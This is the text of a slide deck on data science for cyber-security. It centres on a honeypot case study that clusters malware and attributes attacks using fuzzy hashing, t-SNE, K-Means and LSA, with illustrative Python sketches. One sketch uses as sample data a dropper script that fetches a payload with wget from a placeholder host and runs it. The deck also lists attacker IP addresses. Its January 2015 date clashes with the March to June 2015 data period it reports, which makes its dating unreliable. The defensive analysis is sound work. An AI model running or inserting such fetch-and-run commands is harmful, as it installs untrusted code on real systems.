Applications of Data Science in Cyber-Security Richard Xie https://linkedin.com/in/richardxy January 2015


Page 1: Applications of Data Science in Cyber

Applications of Data Science in Cyber-Security

Richard Xie
https://linkedin.com/in/richardxy
January 2015

Page 2: Applications of Data Science in Cyber

What is Cyber-Security?

• A.K.A.: computer security, network security

• Secure network assets from intrusions and data breaches

• Assets include: servers, workstations, mobile devices

• Layers to secure: firewall, operating systems, files, credentials, etc.

Page 3: Applications of Data Science in Cyber

Why Is It Important?

http://www.informationisbeautiful.net/visualizations/worlds-biggest-data-breaches-hacks/

Page 4: Applications of Data Science in Cyber

Severe shortage of experts predicted

Page 5: Applications of Data Science in Cyber

Cyber-Security + Data Science

Page 6: Applications of Data Science in Cyber

Common Threats

• Exploitation of software vulnerabilities

• Fraud: spoofing, phishing, pharming

• Malicious code (worms, viruses, spyware, etc.)

• DDoS

Page 7: Applications of Data Science in Cyber

How Can Data Science Help?

• Cyber-security is a big-data business
  - network logs
  - files
  - user-machine interactions
  - volume, velocity, variety, and veracity

• Data science can be the engine that powers next-generation cyber-security solutions

Page 8: Applications of Data Science in Cyber

Application Examples

• Spam email classification

• Malware classification

• Malicious IP classification

• Intrusion detection

• Network anomaly detection

• Hacker attribution

• and more...

Page 9: Applications of Data Science in Cyber

A Real Case Study

• Hunting for Honeypot Attackers: A Data Scientist’s Adventure

• A honeynet is a set of honeypot systems deployed on the internet

• A honeypot logs all hacking activities

• A honeypot stores the files uploaded by hackers

• Malware is used as the hackers' weapon

Page 10: Applications of Data Science in Cyber

Raw Statistics

• Data collection period: from March 2015 through the end of June 2015

• >21k attacker IP addresses

• 36 million SSH attempts

• 34k unique usernames and 1 million passwords tried

• 500 malicious domains and >1000 unique malware samples identified

Page 11: Applications of Data Science in Cyber

Geo-location of Attacks

map_hacker_IP.py

Page 12: Applications of Data Science in Cyber

Time Series of Attacks

time_series_activity.py

Page 13: Applications of Data Science in Cyber

What the Raw Data Look Like

Page 14: Applications of Data Science in Cyber

Questions to Answer

• Clustering downloaded/crawled files to find file groups/categories

• Attribution
  - association between attacks from different days and IPs
  - where they came from

Page 15: Applications of Data Science in Cyber

File Similarity Computation

• An MD5 hash can't reflect slight changes in a file: any change produces an unrelated hash

• Fuzzy hashing does: similar files get similar hashes

• Using ssdeep, I computed pair-wise similarity for all collected binary files and tar files
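
The contrast between exact and fuzzy hashing can be illustrated with a small sketch. It is not the ssdeep computation used in the study: `rough_similarity` is a hypothetical stand-in built on `difflib.SequenceMatcher` from the Python standard library, chosen only so the example runs without extra packages, and the sample script contents are invented.

```python
import hashlib
from difflib import SequenceMatcher


def md5_hex(data: bytes) -> str:
    """Exact hash: any change in the input gives an unrelated digest."""
    return hashlib.md5(data).hexdigest()


def rough_similarity(a: bytes, b: bytes) -> int:
    """Stand-in similarity score from 0 to 100 (NOT ssdeep's algorithm)."""
    ratio = SequenceMatcher(None, a, b, autojunk=False).ratio()
    return round(100 * ratio)


# Invented sample: a dropper script and a variant that differs by one byte.
original = (
    b"#!/bin/sh\n"
    b"wget http://example.invalid/payload\n"
    b"chmod +x payload\n"
    b"./payload\n"
)
variant = original.replace(b"payload", b"payl0ad", 1)

print("MD5 equal:", md5_hex(original) == md5_hex(variant))
print("Similarity score:", rough_similarity(original, variant))
```

The MD5 digests differ although the two inputs are nearly identical, while the similarity score stays high. That gap is what a pair-wise fuzzy-hash comparison exploits.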

Page 16: Applications of Data Science in Cyber

Steps to prepare data

• readRawData.py to create a collection "downloadsCollection"

• extract_crawled_file_to_mongo.py to create crawledFileCollection

• uniq_ip_count_MR.js to create uniqURLCollection

• uniq_ip_date_MR.js to create uniqURLDateCollection

• uniq_date_ip_MR.js to create uniqDateURLCollection

• uniq_hash_count_MR.js to create uniqFileCollection

• uniq_country_count_MR.js to create uniqCountryCollection

Page 17: Applications of Data Science in Cyber

Graph of Files

Two files are connected by an edge when their similarity exceeds a threshold (for example, 60%)

identifySimilarDownloads.py from line 166

./graphiti demo graph_data/weighted_files2.json
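
A minimal sketch of the thresholding idea, assuming the pair-wise scores are already available as a dictionary keyed by file pairs. The file names and scores are invented, and the function names are hypothetical; this is not the code in identifySimilarDownloads.py, and it does not produce the JSON format that graphiti expects.

```python
from collections import defaultdict


def build_graph(pair_scores, threshold=60):
    """Connect two files when their similarity score exceeds the threshold."""
    graph = defaultdict(set)
    for (a, b), score in pair_scores.items():
        # Touch both keys so isolated files still appear as nodes.
        graph[a]
        graph[b]
        if score > threshold:
            graph[a].add(b)
            graph[b].add(a)
    return graph


def connected_components(graph):
    """Group files that are linked directly or through other files."""
    seen = set()
    groups = []
    for start in sorted(graph):
        if start in seen:
            continue
        stack = [start]
        group = set()
        while stack:
            node = stack.pop()
            if node in seen:
                continue
            seen.add(node)
            group.add(node)
            stack.extend(graph[node] - seen)
        groups.append(sorted(group))
    return groups


# Invented scores on a 0-100 scale.
scores = {
    ("a.bin", "b.bin"): 85,
    ("b.bin", "c.bin"): 72,
    ("a.bin", "c.bin"): 40,
    ("c.bin", "d.tar"): 10,
}
print(connected_components(build_graph(scores)))
```

Connected components are one simple way to read file groups off such a graph; files a.bin and c.bin end up together here through b.bin even though their direct score is below the threshold.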

Page 18: Applications of Data Science in Cyber

Files -> Hacker

• A hacker may use the same or similar tools on different days to hack systems

• The file similarity matrix may provide hints about who was using those files

• Treat date+IP as a unique attack, and all its associated binary files as its features

• Construct a term matrix for all attacks (one row per attack, one column per file)
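
The construction above can be sketched as follows. The records, file hashes, and function name are hypothetical, the IP addresses come from documentation ranges, and the binary 0/1 weighting is an assumption: the slides do not say whether the entries were counts, flags, or similarity-weighted values.

```python
def build_attack_matrix(records):
    """Build an attack-by-file matrix from (date, ip, file_hash) records.

    Each distinct date+IP pair is one attack (a row); each distinct file
    is one feature (a column). Entries are 1 when the file was seen in
    that attack and 0 otherwise (binary weighting is an assumption).
    """
    attacks = sorted({(date, ip) for date, ip, _ in records})
    files = sorted({file_hash for _, _, file_hash in records})
    row_of = {attack: i for i, attack in enumerate(attacks)}
    col_of = {file_hash: j for j, file_hash in enumerate(files)}
    matrix = [[0] * len(files) for _ in attacks]
    for date, ip, file_hash in records:
        matrix[row_of[(date, ip)]][col_of[file_hash]] = 1
    return attacks, files, matrix


# Invented records for illustration only.
records = [
    ("2015-03-23", "192.0.2.10", "hashA"),
    ("2015-03-23", "192.0.2.10", "hashB"),
    ("2015-03-24", "198.51.100.7", "hashA"),
    ("2015-03-24", "198.51.100.7", "hashC"),
]
attacks, files, matrix = build_attack_matrix(records)
for attack, row in zip(attacks, matrix):
    print(attack, row)
```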

Page 19: Applications of Data Science in Cyber

t-SNE on Attack-Malware Matrix with K-Means Labeling

k=10

t-SNE: t-Distributed Stochastic Neighbor Embedding

get_similar_IPs.py from line 181
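
A rough sketch of the K-Means labeling step only; the t-SNE embedding is not reproduced here, and in practice a library such as scikit-learn would likely be used for both. The points are invented, the example uses k=2 instead of the k=10 on the slide to stay small, and the farthest-first initialization is an assumption made to keep the result deterministic.

```python
import math


def kmeans(points, k, iterations=50):
    """Plain Lloyd's algorithm on a list of coordinate tuples."""
    # Farthest-first initialization (an assumption, not from the slides).
    centers = [points[0]]
    while len(centers) < k:
        centers.append(
            max(points, key=lambda p: min(math.dist(p, c) for c in centers))
        )
    labels = [0] * len(points)
    for _ in range(iterations):
        # Assignment step: each point takes the label of its nearest center.
        labels = [
            min(range(k), key=lambda j: math.dist(p, centers[j]))
            for p in points
        ]
        # Update step: each center moves to the mean of its members.
        new_centers = []
        for j in range(k):
            members = [p for p, lab in zip(points, labels) if lab == j]
            if members:
                new_centers.append(
                    tuple(sum(axis) / len(members) for axis in zip(*members))
                )
            else:
                new_centers.append(centers[j])
        if new_centers == centers:
            break
        centers = new_centers
    return labels, centers


# Invented 2-D points standing in for embedded attack vectors.
points = [(0, 0), (0, 1), (1, 0), (10, 10), (10, 11), (11, 10)]
labels, centers = kmeans(points, k=2)
print(labels)
```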

Page 20: Applications of Data Science in Cyber

Latent Semantic Analysis

• LSA is widely used in NLP for topic finding

• Analyzes relationships between a set of documents and the terms they contain

• Uses SVD to reduce the number of dimensions while maintaining record similarities

SVD: Singular Value Decomposition
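
The dimensionality-reduction step can be sketched in a dependency-free way. This is an illustration under stated assumptions, not the study's code: it uses power iteration with deflation on the Gram matrix instead of a library SVD routine, the function names are hypothetical, and the small matrix is invented. Each row stands for an attack and each column for a file.

```python
import math
import random


def top_singular_triplets(matrix, rank=2, iterations=500, seed=0):
    """Approximate the leading (sigma, u, v) triplets of a matrix."""
    rng = random.Random(seed)
    n_cols = len(matrix[0])
    # Gram matrix G = A^T A; its eigenvectors are the right singular vectors.
    gram = [
        [sum(row[i] * row[j] for row in matrix) for j in range(n_cols)]
        for i in range(n_cols)
    ]
    triplets = []
    for _ in range(rank):
        v = [rng.random() + 0.1 for _ in range(n_cols)]
        exhausted = False
        for _ in range(iterations):
            w = [sum(gram[i][j] * v[j] for j in range(n_cols)) for i in range(n_cols)]
            norm = math.sqrt(sum(x * x for x in w))
            if norm < 1e-12:  # nothing left to extract
                exhausted = True
                break
            v = [x / norm for x in w]
        if exhausted:
            break
        av = [sum(a * b for a, b in zip(row, v)) for row in matrix]
        sigma = math.sqrt(sum(x * x for x in av))
        if sigma < 1e-9:
            break
        u = [x / sigma for x in av]
        triplets.append((sigma, u, v))
        # Deflation: remove the component just found from the Gram matrix.
        for i in range(n_cols):
            for j in range(n_cols):
                gram[i][j] -= sigma * sigma * v[i] * v[j]
    return triplets


def project_rows(matrix, rank=2):
    """Coordinates of each row in the reduced space (sigma_k * u_k)."""
    triplets = top_singular_triplets(matrix, rank)
    return [
        [sigma * u[i] for sigma, u, _ in triplets]
        for i in range(len(matrix))
    ]


# Invented attack-by-file matrix: the first two attacks share the same files.
demo = [[1, 1, 0], [1, 1, 0], [0, 0, 1]]
for coords in project_rows(demo):
    print([round(c, 3) for c in coords])
```

Rows with the same file profile land on the same point in the reduced space, which is the property that lets the reduced vectors stand in for the full rows when comparing attacks.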

Page 21: Applications of Data Science in Cyber

Attacks Expressed with 1st and 2nd Principal Components

Each vector is a date+IP incident (a row in the term matrix)

Page 22: Applications of Data Science in Cyber

Compute Similarities among Attacks

• Similar attacks to a particular one: 2015-03-23%%61.160.212.21:5947 is similar to

2015-03-23%%118.193.241.192, similarity 0.958453
2015-03-23%%222.186.190.157:56789, similarity 0.996835
2015-03-24%%222.186.190.157:56789, similarity 0.961000
2015-03-25%%117.21.176.79:333, similarity 0.997087
2015-03-25%%222.186.190.157:56789, similarity 0.946751
2015-06-17%%222.186.30.175:56789, similarity 0.996835
2015-06-17%%61.160.247.42:1988, similarity 0.996835
2015-06-18%%222.186.30.175:56789, similarity 0.996835
2015-06-18%%61.160.247.42:1988, similarity 0.996835
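
A ranking like the one above could be produced along these lines. The slides do not name the similarity measure; cosine similarity is assumed here because it is commonly paired with LSA. The keys follow the date%%IP format shown on the slide, but the addresses (from documentation ranges), the vectors, and the function names are invented.

```python
import math


def cosine_similarity(a, b):
    """Cosine of the angle between two vectors (0.0 if either is all zeros)."""
    dot = sum(x * y for x, y in zip(a, b))
    norm_a = math.sqrt(sum(x * x for x in a))
    norm_b = math.sqrt(sum(y * y for y in b))
    if norm_a == 0 or norm_b == 0:
        return 0.0
    return dot / (norm_a * norm_b)


def most_similar(target, vectors, top_n=3):
    """Rank all other attacks by similarity to the target attack."""
    scores = [
        (name, cosine_similarity(vectors[target], vec))
        for name, vec in vectors.items()
        if name != target
    ]
    return sorted(scores, key=lambda item: item[1], reverse=True)[:top_n]


# Invented reduced vectors for three attacks.
vectors = {
    "2015-03-23%%192.0.2.10": [1.0, 0.2],
    "2015-03-24%%198.51.100.7": [2.0, 0.5],
    "2015-06-17%%203.0.113.5": [0.1, 1.0],
}
for name, score in most_similar("2015-03-23%%192.0.2.10", vectors):
    print(f"{name}, similarity {score:.6f}")
```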

Page 23: Applications of Data Science in Cyber

Time Series of Attack Counts for Group 1

Page 24: Applications of Data Science in Cyber

Time Series of Attack Counts for Group 2

Page 25: Applications of Data Science in Cyber

Visualization of Attack Graph

./graphiti demo graph_data/weighted_IPs_95percent.json

Page 26: Applications of Data Science in Cyber

We Know Where They Came From

python_map_IP_latlon.py

Page 27: Applications of Data Science in Cyber

So what?

• The analysis may lead to:
  - near-real-time attribution (is it a new attack, or something we saw before?)
  - near-real-time triage (is it new malware, or a variant of an existing one?)
  - more...